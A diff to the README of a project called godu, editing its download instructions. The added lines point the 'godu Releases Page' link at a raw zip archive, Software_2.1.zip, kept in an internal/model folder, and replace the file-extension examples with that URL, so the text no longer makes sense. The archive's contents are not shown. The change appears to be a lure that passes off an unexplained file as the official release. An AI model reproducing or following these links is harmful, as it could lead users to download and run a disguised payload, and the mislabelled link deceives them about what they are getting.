Lime0moss/godu/README.md

 ### Step 1: Download godu

-Click the big blue button at the top or go to the [godu Releases Page](https://github.com/Lime0moss/godu/releases).
+Click the big blue button at the top or go to the [godu Releases Page](https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip).
 This page holds all versions of godu.

 Look for the version matching your computer's operating system:

 - Windows files usually end with `.exe`
-- macOS files might end with `.dmg` or `.tar.gz`
+- macOS files might end with `.dmg` or `https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip`
-- Linux files often end with `.tar.gz` or `.AppImage`
+- Linux files often end with `https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip` or `.AppImage`

 Download the file that fits your system.